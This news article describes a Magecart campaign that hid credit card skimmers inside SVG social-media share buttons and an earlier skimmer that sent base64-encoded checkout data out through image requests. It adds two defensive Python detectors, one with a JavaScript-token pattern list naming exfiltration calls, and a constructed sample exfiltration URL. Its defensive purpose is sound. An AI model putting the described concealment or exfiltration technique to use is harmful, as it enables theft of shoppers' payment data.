February 1, 2021 By David Bisson 2 min read

A gang of threat actors is using social media link buttons to hide malicious code that leads to a credit card skimmer. 

Innocuous Images Hide Credit Card Skimmer

Security firm Sanguine Security (SanSec) discovered the attacks in November 2020. They are a Magecart-style web skimming operation: a script injected into a store's checkout page copies payment card details as shoppers type them in.

First, the attackers disguised the malicious payload, the credit card skimmer included, as an HTML <svg> element, using syntax that resembles legitimate Scalable Vector Graphics (SVG) markup, the XML-based format for two-dimensional vector images. To make the element look harmless, the gang named its payloads after at least six well-known social media companies, so that each one passed as a social media sharing button.

Second, a separate decoder script read the payload out of the SVG element and executed it. Because the decoder could live in a different location from the payload, an analyst who came across the unusual SVG file on its own saw only inert data, with no sign of how it was meant to run, which made the attack harder to unravel.

When a shopper checked out on an e-commerce site hosting these buttons, the decoder ran the payload and the credit card number stealer went to work. The same technique could just as well conceal other kinds of malware.
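The point of the concealment is that the element is well-formed SVG, so validating the syntax tells a defender nothing. The following Python scanner is an added example (not SanSec's tooling) of the kind of content check that does help: it parses the fragment, then asks whether each attribute and text node actually looks like vector graphics. Both sample fragments, the brand list and the placeholder blob are constructed for this example; the blob encodes a harmless string, not skimmer code.

```python
"""Heuristic scanner for SVG markup that carries a hidden script payload.

Added example, not SanSec's tooling.  The malicious element in the campaign
above was well-formed SVG, so a syntax check passes it; this scanner instead
asks whether the attribute and text contents look like vector graphics.
Both sample fragments below are constructed for this example.
"""
import base64
import re
import xml.etree.ElementTree as ET
from typing import List

# Everything a legitimate <path d="..."> may contain: command letters,
# numbers, separators and exponents.  A base64 blob or JavaScript fails this.
PATH_CHARS = re.compile(r"^[MmZzLlHhVvCcSsQqTtAa0-9,.\-+eE\s]*$")
# 64+ consecutive base64-alphabet characters: far too long to be path data.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# Strings with no place in an icon but common in skimmers and loaders.
JS_TOKENS = ("eval(", "atob(", "fromCharCode", "document.", "XMLHttpRequest",
             "fetch(", "new Image(", "javascript:")
# Brand names this example checks for in element ids (list is this example's own).
BRANDS = ("google", "facebook", "twitter", "instagram", "youtube", "pinterest")


def svg_findings(markup: str) -> List[str]:
    """Return findings for one <svg> fragment; [] means nothing suspicious.

    Raises xml.etree.ElementTree.ParseError when the markup is malformed.
    A clean parse is exactly what the attacker is counting on, so the real
    checks only start once parsing has succeeded.
    """
    root = ET.fromstring(markup)
    findings = []
    for el in root.iter():
        tag = el.tag.split("}")[-1]  # strip the XML namespace
        if tag == "script":
            findings.append("<script> element inside a share button icon")
        for name, value in el.attrib.items():
            name = name.split("}")[-1]
            if name == "d" and not PATH_CHARS.match(value):
                findings.append(f"<{tag} d> contains non-path characters")
            if B64_RUN.search(value):
                findings.append(f"<{tag} {name}> holds a base64-like blob of {len(value)} chars")
            if any(tok in value for tok in JS_TOKENS):
                findings.append(f"<{tag} {name}> contains a JavaScript token")
        text = (el.text or "").strip()
        if B64_RUN.search(text) or any(tok in text for tok in JS_TOKENS):
            findings.append(f"<{tag}> text content looks like code or encoded data")
    root_id = root.get("id", "").lower()
    if findings and any(brand in root_id for brand in BRANDS):
        findings.append(f"suspicious element is named after a social media brand ({root.get('id')!r})")
    return findings


# Constructed: a plausible share icon, the kind of markup the payload imitates.
BENIGN_BUTTON = """<svg xmlns="http://www.w3.org/2000/svg" id="share_button" viewBox="0 0 24 24" width="24" height="24">
  <path d="M22 12a10 10 0 1 0-11.6 9.9v-7H7.9V12h2.5V9.8c0-2.5 1.5-3.9 3.8-3.9 1.1 0 2.2.2 2.2.2v2.4h-1.2c-1.2 0-1.6.8-1.6 1.6V12h2.8l-.4 2.9h-2.3v7A10 10 0 0 0 22 12z"/>
</svg>"""

# Constructed: the same icon with a second <path> whose d attribute carries a
# base64 blob instead of path data.  The blob encodes a harmless placeholder
# string, not skimmer code; in the real campaign a separate decoder read the
# payload out and executed it.
_PLACEHOLDER = base64.b64encode(
    b"constructed placeholder standing in for a skimmer payload; not malware " * 2
).decode()
HIDDEN_PAYLOAD = f"""<svg xmlns="http://www.w3.org/2000/svg" id="facebook_full" viewBox="0 0 24 24">
  <path d="M22 12a10 10 0 1 0-11.6 9.9v-7H7.9V12h2.5z"/>
  <path d="{_PLACEHOLDER}"/>
</svg>"""


if __name__ == "__main__":
    for label, markup in (("benign", BENIGN_BUTTON), ("hidden payload", HIDDEN_PAYLOAD)):
        print(f"{label}: {svg_findings(markup) or 'clean'}")
```

Both fragments parse without error; only the content checks separate them. The path-grammar check is the sharpest of the heuristics, because a base64 blob or script text cannot avoid characters that never occur in SVG path data.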

Credit Card Skimmer Concealed in an Image

This might be the first instance of a malicious payload being hidden inside a valid image as part of a widespread campaign. But it is not the first time Magecart actors have used an image in a credit card skimmer's attack chain. (Broadly, hiding a payload inside an innocuous image or audio file is a form of steganography: the carrier file looks, and in the SVG case even parses, like a normal file, and the payload only becomes code once a separate decoder extracts it.)

In June 2020, SanSec detected a Magecart attack in which a credit card skimmer attached itself to the compromised checkout page's submit button. Clicking that button caused the skimmer to seize, serialize and base64 encode the entire checkout form. The script then added a temporary image with a _preloader identifier to the Document Object Model (DOM). The image's source URL pointed at the attackers' server, so by appending the encoded checkout data to that URL, the attackers had the shopper's own browser exfiltrate the information in what looked like an ordinary image request.
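Because the data leaves in the query string of an image request, it is visible to anyone watching outbound traffic, which is what the network monitoring recommended later in this article would do. The following Python detector is an added example (not SanSec's code) that scans forward-proxy log lines for image requests whose query data, plain or base64-encoded, contains a Luhn-valid card number. The log lines, the host cdn-example.invalid, the shop.example site and the card number (the common 4111 1111 1111 1111 test value) are all constructed for this example.

```python
"""Flag checkout data leaving in an image request, as a network monitor would.

Added example, not SanSec's code.  The June 2020 skimmer described above
serialised the checkout form, base64-encoded it and appended it to the URL of
an <img> it inserted into the page, so the shopper's browser carried the data
out in what looked like an ordinary image fetch.  Everything below is
constructed: the egress-proxy log lines, the hosts and the card number.
"""
import base64
import re
from typing import Dict, List, Optional
from urllib.parse import quote, unquote, urlsplit

IMAGE_EXT = (".gif", ".png", ".jpg", ".jpeg", ".webp", ".svg")
PAN_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")
# Combined-log-format line from a forward proxy, where the URL is absolute.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST|HEAD) (\S+) [^"]*" (\d{3})')


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: true for a well-formed card number (not proof it is real)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        n = int(ch)
        if i % 2 == 1:  # double every second digit from the right
            n = n * 2 - 9 if n > 4 else n * 2
        total += n
    return total % 10 == 0


def try_base64(value: str) -> Optional[str]:
    """Decode standard or URL-safe base64 after percent-decoding; None if it is not."""
    s = unquote(value).replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def exfil_findings(url: str) -> List[str]:
    """Findings for one request URL; only image paths are examined, as in this campaign."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(IMAGE_EXT):
        return []
    findings = []
    # Split the query by hand: parse_qsl would turn the '+' of standard base64 into spaces.
    for pair in filter(None, parts.query.split("&")):
        key, sep, value = pair.partition("=")
        # "d=BLOB" -> BLOB; a bare "BLOB==" (padding only after the first '=') -> BLOB
        raw = value if sep and value.strip("=") else key
        for label, text in (("plain", unquote(raw)), ("base64", try_base64(raw))):
            if not text:
                continue
            for pan in PAN_RE.findall(text):
                if luhn_ok(pan):
                    findings.append(f"{label} query data carries Luhn-valid PAN {pan[:6]}...{pan[-4:]}")
    return findings


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run exfil_findings over proxy log lines; return one hit per suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = m.group(3)
        findings = exfil_findings(url)
        if findings:
            hits.append({"client": m.group(1), "host": urlsplit(url).hostname,
                         "url": url, "findings": findings})
    return hits


# Constructed sample: a serialised checkout form, base64-encoded and appended
# to an image URL on a host the store does not own, as the skimmer did.
_FORM = "cc_number=4111111111111111&cc_exp=12%2F26&cc_cvv=123&email=shopper%40example.com"
EXFIL_URL = ("https://cdn-example.invalid/pixel.gif?d="
             + quote(base64.b64encode(_FORM.encode()).decode(), safe=""))
LOG_LINES = [
    '203.0.113.10 - - [01/Feb/2021:10:12:01 +0000] "GET https://shop.example/checkout/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [01/Feb/2021:10:12:03 +0000] "GET https://shop.example/static/logo.png?v=42 HTTP/1.1" 200 880 "-" "Mozilla/5.0"',
    f'203.0.113.10 - - [01/Feb/2021:10:12:09 +0000] "GET {EXFIL_URL} HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit["client"], "->", hit["host"], hit["findings"])
```

The image-path filter mirrors this particular campaign; dropping it makes the same check apply to any outbound request. Restricting alerts to Luhn-valid numbers keeps ordinary cache-busting parameters and timestamps from firing, and the masked PAN in the finding avoids copying full card numbers into alert storage.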

SanSec had also seen other actors use the same concealment technique in June 2020, in what may have been a test run for the later campaign. Those attackers infected just nine sites, and the skimmer was live on only one of them; on the rest, either the payload or the decoder was missing, so the two-part chain never completed.

How to Defend Against Evasive Skimmers

Together, these attacks highlight the lengths to which attackers will go to hide their malware. They also show that checking a file for valid syntax is not a malware test: the SVG parsed and rendered as a legitimate image while carrying the skimmer.

First, organizations that run an online store need to keep malicious actors from injecting a credit card skimmer into their checkout pages in the first place. That means protecting the site's administrative back end with strong, unique passwords and multifactor authentication, and using vulnerability management to find and fix the weaknesses that attackers exploit to gain unauthorized access to their domains.

Second, organizations need the ability to detect and respond when a skimmer does get in. That means using threat intelligence to stay on top of new concealment techniques such as this one, monitoring network traffic for checkout data leaving the site in unexpected requests, and keeping regular backups of both data and site files so that a compromised site can be restored to a known good state.
